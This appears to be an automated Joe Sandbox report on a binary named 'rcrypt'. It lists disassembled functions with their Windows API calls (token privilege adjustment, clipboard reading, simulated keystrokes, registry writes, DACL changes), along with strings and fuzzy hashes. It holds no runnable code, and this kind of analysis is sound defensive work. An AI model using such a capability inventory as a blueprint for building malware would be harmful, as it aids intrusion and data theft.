API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: f4db4b6ef164aebf8636d431c16daff6c3dfc5270601464ffbd3283953cab9f3
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 71E0BF7498110EEFDB00EFA8D9496DE7BB4EF04711F1045A5FD05D7681DB309E548A62

Function 016F22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 016F22B1

Memory Dump Source

Source File: 00000000.00000002.1319460756.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_rcrypt.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 3b204f05e9844b8e2a1bc1ed6e345a57c20e288dc3c34a8cf53f7704026fc076
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 1EE0E67498110EDFDB00EFB8D94969E7FB4EF04711F104165FD01D2281D6309D508A72

Non-executed Functions

Function 0017CDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0017CE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0017CE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0017CED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0017CF00
SendMessageW.USER32 ref: 0017CF29
_wcsncpy.LIBCMT ref: 0017CFA1
GetKeyState.USER32(00000011), ref: 0017CFC2
GetKeyState.USER32(00000009), ref: 0017CFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0017CFE5
GetKeyState.USER32(00000010), ref: 0017CFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0017D018
SendMessageW.USER32 ref: 0017D03F
SendMessageW.USER32(?,00001030,?,0017B602), ref: 0017D145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0017D15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0017D16E
SetCapture.USER32(?), ref: 0017D177
ClientToScreen.USER32(?,?), ref: 0017D1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0017D1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0017D203
ReleaseCapture.USER32 ref: 0017D20E
GetCursorPos.USER32(?), ref: 0017D248
ScreenToClient.USER32(?,?), ref: 0017D255
SendMessageW.USER32(?,00001012,00000000,?), ref: 0017D2B1
SendMessageW.USER32 ref: 0017D2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 0017D31C
SendMessageW.USER32 ref: 0017D34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0017D36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0017D37B
GetCursorPos.USER32(?), ref: 0017D39B
ScreenToClient.USER32(?,?), ref: 0017D3A8
GetParent.USER32(?), ref: 0017D3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 0017D431
SendMessageW.USER32 ref: 0017D462
ClientToScreen.USER32(?,?), ref: 0017D4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0017D4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 0017D51A
SendMessageW.USER32 ref: 0017D53D
ClientToScreen.USER32(?,?), ref: 0017D58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0017D5C3

Part of subcall function 000F25DB: GetWindowLongW.USER32(?,000000EB), ref: 000F25EC

GetWindowLongW.USER32(?,000000F0), ref: 0017D65F

Strings

@GUI_DRAGID, xrefs: 0017D1AA
@U=u, xrefs: 0017CE91, 0017CF00, 0017CF29, 0017CFE5, 0017D018, 0017D03F, 0017D145, 0017D2B1, 0017D2DF, 0017D31C, 0017D34B, 0017D431, 0017D462, 0017D51A, 0017D53D
F, xrefs: 0017D543

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$@U=u$F
API String ID: 3977979337-1007936534
Opcode ID: 3f6b71ed4ddff30fb3823610b6240d26a71c556bbd408fa5fbb6f3d6e5c19599
Instruction ID: 1c2fe9f2176aa616d99e1e744f3740c37530f5ae59f16e9728603c4b066c9d52
Opcode Fuzzy Hash: 3f6b71ed4ddff30fb3823610b6240d26a71c556bbd408fa5fbb6f3d6e5c19599
Instruction Fuzzy Hash: 27429C70204345AFC725CF28C884EAABFF5FF48714F14862DF699976A1CB319991CB92

Function 0017804A Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0017873F

Strings

@U=u, xrefs: 001780E0, 00178134, 001781E7, 0017822E, 00178256, 001783BB, 00178456, 001784A0, 001784EA, 0017850A, 001785EC, 00178625, 00178676, 001786E1, 0017873F
%d/%02d/%02d, xrefs: 00178478

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d$@U=u
API String ID: 3850602802-2764005415
Opcode ID: d8a08d525e100e010b45f7e6504e5f0d54c1b1c9e6d07a7091c49a433a270895
Instruction ID: 388157a8fe9a815341159c293796d052b05614de5750ec3aa4ca01b9f90b4a8e
Opcode Fuzzy Hash: d8a08d525e100e010b45f7e6504e5f0d54c1b1c9e6d07a7091c49a433a270895
Instruction Fuzzy Hash: 7612A371580244ABEB299F28CC4DFAB7BB4EF49710F208169F91EDA1E1DF709981CB50

Function 0010710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 001075C2
_memset.LIBCMT ref: 001076B1
_memmove.LIBCMT ref: 00107C4B
_memmove.LIBCMT ref: 00107E4F

Strings

Q\E, xrefs: 001081C1
[:<:]], xrefs: 001075F1
DEFINE, xrefs: 001425AF
\b(?<=\w), xrefs: 00143C41
[:>:]], xrefs: 0010760A
\b(?=\w), xrefs: 00143C34

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 9cf5b8e1104fd999433e1aecacd9d81a1b50bc96a1d92e335cd36ecdb2d3a85c
Instruction ID: a4cb0dc1bc56db4b88b8165b2ef3250c425d96f8587e6bd440780b4084440b53
Opcode Fuzzy Hash: 9cf5b8e1104fd999433e1aecacd9d81a1b50bc96a1d92e335cd36ecdb2d3a85c
Instruction Fuzzy Hash: F3939171E04216DBDB28CF98C881BADB7B1FF48710F65816AE955EB2D0E7709E81CB50

Function 000F4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 000F4A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0012DA8E
IsIconic.USER32(?), ref: 0012DA97
ShowWindow.USER32(?,00000009), ref: 0012DAA4
SetForegroundWindow.USER32(?), ref: 0012DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0012DAC4
GetCurrentThreadId.KERNEL32 ref: 0012DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 0012DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 0012DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 0012DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 0012DAF8
SetForegroundWindow.USER32(?), ref: 0012DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 0012DB10
keybd_event.USER32(00000012,00000000), ref: 0012DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 0012DB25
keybd_event.USER32(00000012,00000000), ref: 0012DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 0012DB33
keybd_event.USER32(00000012,00000000), ref: 0012DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 0012DB42
keybd_event.USER32(00000012,00000000), ref: 0012DB47
SetForegroundWindow.USER32(?), ref: 0012DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 0012DB71

Strings

Shell_TrayWnd, xrefs: 0012DA89

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 2e6a5b66633fe077ceb60012a9f27e7a46b180d2e62530f812b0b1699c2b1a9e
Instruction ID: 4ff3e69a172eb928a70d50984325106fc16897be4249321998961fa9b0f7f520
Opcode Fuzzy Hash: 2e6a5b66633fe077ceb60012a9f27e7a46b180d2e62530f812b0b1699c2b1a9e
Instruction Fuzzy Hash: 06315571A403187FEB216F61EC4AF7F3E7CEB44B50F114029FA04EA1D0C6705991AAA1

Function 00148858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00148CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00148D0D
Part of subcall function 00148CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00148D3A
Part of subcall function 00148CC3: GetLastError.KERNEL32 ref: 00148D47

_memset.LIBCMT ref: 0014889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 001488ED
CloseHandle.KERNEL32(?), ref: 001488FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00148915
GetProcessWindowStation.USER32 ref: 0014892E
SetProcessWindowStation.USER32(00000000), ref: 00148938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00148952

Part of subcall function 00148713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00148851), ref: 00148728
Part of subcall function 00148713: CloseHandle.KERNEL32(?,?,00148851), ref: 0014873A

Strings

default, xrefs: 0014894D
, xrefs: 001488AA
winsta0, xrefs: 00148910

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 3099f76e9e258516dd989a496b3933209c55b395b99931b5aaeb0aa27ef5edf8
Instruction ID: f2927e42b2ea69fcc4a52c6ebdf69ef2e7f5691571d02030a0cbba54c4f7acaf
Opcode Fuzzy Hash: 3099f76e9e258516dd989a496b3933209c55b395b99931b5aaeb0aa27ef5edf8
Instruction Fuzzy Hash: 42816971900209AFDF11DFA4CC45AEEBBB8FF08344F28416AF914A7261DB718E95DB61

Function 0016425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0017F910), ref: 00164284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00164292
GetClipboardData.USER32(0000000D), ref: 0016429A
CloseClipboard.USER32 ref: 001642A6
GlobalLock.KERNEL32(00000000), ref: 001642C2
CloseClipboard.USER32 ref: 001642CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 001642E1
IsClipboardFormatAvailable.USER32(00000001), ref: 001642EE
GetClipboardData.USER32(00000001), ref: 001642F6
GlobalLock.KERNEL32(00000000), ref: 00164303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00164337
CloseClipboard.USER32 ref: 00164447

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 33e4f10d121118577da67a1f77d5cb86078070002c491cf3e58f71d40b9c7c29
Instruction ID: 3e4442c36484d3cf8b282abbad8b088eb104fb948e58a1b5d933a6ae5dacf91a
Opcode Fuzzy Hash: 33e4f10d121118577da67a1f77d5cb86078070002c491cf3e58f71d40b9c7c29
Instruction Fuzzy Hash: C9519F31204205ABD711EF60EC9AFBF77B8AF84B00F10452DF65AD25A2DF70D9858B62

Function 0015C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0015C9F8
FindClose.KERNEL32(00000000), ref: 0015CA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0015CA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0015CA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 0015CAAF
__swprintf.LIBCMT ref: 0015CAFB
__swprintf.LIBCMT ref: 0015CB3E

Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82

__swprintf.LIBCMT ref: 0015CB92

Part of subcall function 001138D8: __woutput_l.LIBCMT ref: 00113931

__swprintf.LIBCMT ref: 0015CBE0

Part of subcall function 001138D8: __flsbuf.LIBCMT ref: 00113953
Part of subcall function 001138D8: __flsbuf.LIBCMT ref: 0011396B

__swprintf.LIBCMT ref: 0015CC2F
__swprintf.LIBCMT ref: 0015CC7E
__swprintf.LIBCMT ref: 0015CCCD

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0015CAF5
%4d, xrefs: 0015CB38
%02d, xrefs: 0015CB86, 0015CB90, 0015CBDE, 0015CC2D, 0015CC7C, 0015CCCB

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 04dd76ddeb54f3fcaf3a64e1a04cb52a97a65305ebe3524f05880250063bdc98
Instruction ID: cbc3ee778467b38ec58fea7bfaf0682240e173d9fe827108e13e52dd9ca499c6
Opcode Fuzzy Hash: 04dd76ddeb54f3fcaf3a64e1a04cb52a97a65305ebe3524f05880250063bdc98
Instruction Fuzzy Hash: 91A11FB1508308ABC704EF54C885EFFB7ECAF94701F404929B695C6592EB34DA49DBA2

Function 0015F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 0015F221
_wcscmp.LIBCMT ref: 0015F236
_wcscmp.LIBCMT ref: 0015F24D
GetFileAttributesW.KERNEL32(?), ref: 0015F25F
SetFileAttributesW.KERNEL32(?,?), ref: 0015F279
FindNextFileW.KERNEL32(00000000,?), ref: 0015F291
FindClose.KERNEL32(00000000), ref: 0015F29C
FindFirstFileW.KERNEL32(*.*,?), ref: 0015F2B8
_wcscmp.LIBCMT ref: 0015F2DF
_wcscmp.LIBCMT ref: 0015F2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 0015F308
SetCurrentDirectoryW.KERNEL32(001AA5A0), ref: 0015F326
FindNextFileW.KERNEL32(00000000,00000010), ref: 0015F330
FindClose.KERNEL32(00000000), ref: 0015F33D
FindClose.KERNEL32(00000000), ref: 0015F34F

Strings

*.*, xrefs: 0015F2B3

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 448f576c655f0558f785006b8774e1c4b99607275fb2eea459eb32f1e4dafcff
Instruction ID: ca14b5655ce58ca559e3d62b15882b8549096c3936fe46a76dd10688f96c9597
Opcode Fuzzy Hash: 448f576c655f0558f785006b8774e1c4b99607275fb2eea459eb32f1e4dafcff
Instruction Fuzzy Hash: 4F31A37A500219AEDF54DBB4DC59ADF73ACAF09361F50417DE828D70A0EB30DACACA54

Function 00170AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00170BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,0017F910,00000000,?,00000000,?,?), ref: 00170C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00170C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00170D1D
RegCloseKey.ADVAPI32(?), ref: 0017103D
RegCloseKey.ADVAPI32(00000000), ref: 0017104A

Strings

REG_BINARY, xrefs: 00170FD8
REG_SZ, xrefs: 00170D5B
REG_QWORD, xrefs: 00170F8B
REG_MULTI_SZ, xrefs: 00170E05
REG_EXPAND_SZ, xrefs: 00170CBA
REG_DWORD, xrefs: 00170F0E

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: d9089d66d4567953e94541572c8504e34b4d3916a2e9cfee2964ce63566ab0bb
Instruction ID: ca41ea1729e2261f12f94bf5af3067f38ca17a5f2f77c3856fb4a668ee19735e
Opcode Fuzzy Hash: d9089d66d4567953e94541572c8504e34b4d3916a2e9cfee2964ce63566ab0bb
Instruction Fuzzy Hash: 940249752046019FCB14EF28C881A6AB7F5FF89714F05885DF99A9B762CB70ED41CB81

Function 0015F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 0015F37E
_wcscmp.LIBCMT ref: 0015F393
_wcscmp.LIBCMT ref: 0015F3AA

Part of subcall function 001545C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001545DC

FindNextFileW.KERNEL32(00000000,?), ref: 0015F3D9
FindClose.KERNEL32(00000000), ref: 0015F3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 0015F400
_wcscmp.LIBCMT ref: 0015F427
_wcscmp.LIBCMT ref: 0015F43E
SetCurrentDirectoryW.KERNEL32(?), ref: 0015F450
SetCurrentDirectoryW.KERNEL32(001AA5A0), ref: 0015F46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 0015F478
FindClose.KERNEL32(00000000), ref: 0015F485
FindClose.KERNEL32(00000000), ref: 0015F497

Strings

*.*, xrefs: 0015F3FB

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 52ae5b7dd62c51f386a9f5e184a2aacaa187abf629fecbd7ca855b8ab401aeb0
Instruction ID: 24b9254bed9c699808a861733a3ba6e346b6d627ac1c74fbec7e72c1eadfbcc4
Opcode Fuzzy Hash: 52ae5b7dd62c51f386a9f5e184a2aacaa187abf629fecbd7ca855b8ab401aeb0
Instruction Fuzzy Hash: B931E775501219AFDF109F64EC88ADF77ACAF09361F100179EC64E70A0DB30DA8ACA54

Function 001481F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0014874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00148766
Part of subcall function 0014874A: GetLastError.KERNEL32(?,0014822A,?,?,?), ref: 00148770
Part of subcall function 0014874A: GetProcessHeap.KERNEL32(00000008,?,?,0014822A,?,?,?), ref: 0014877F
Part of subcall function 0014874A: HeapAlloc.KERNEL32(00000000,?,0014822A,?,?,?), ref: 00148786
Part of subcall function 0014874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0014879D

Part of subcall function 001487E7: GetProcessHeap.KERNEL32(00000008,00148240,00000000,00000000,?,00148240,?), ref: 001487F3
Part of subcall function 001487E7: HeapAlloc.KERNEL32(00000000,?,00148240,?), ref: 001487FA
Part of subcall function 001487E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00148240,?), ref: 0014880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0014825B
_memset.LIBCMT ref: 00148270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0014828F
GetLengthSid.ADVAPI32(?), ref: 001482A0
GetAce.ADVAPI32(?,00000000,?), ref: 001482DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001482F9
GetLengthSid.ADVAPI32(?), ref: 00148316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00148325
HeapAlloc.KERNEL32(00000000), ref: 0014832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0014834D
CopySid.ADVAPI32(00000000), ref: 00148354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00148385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001483AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 001483BF

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: f37e9a3dc3b74952d6b679c9df28afe907365f0ac225349021e46f68cbb61748
Instruction ID: cd1f7bd24035468ce8ae3267b333be986bf2ed91bb76c2cb739c2a32485b2b3f
Opcode Fuzzy Hash: f37e9a3dc3b74952d6b679c9df28afe907365f0ac225349021e46f68cbb61748
Instruction Fuzzy Hash: FE614871900209AFDF10DFA5DC84EEEBBB9FF04700F148169F915A72A1DB319A46CB60

Function 00106843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

UTF), xrefs: 00141533
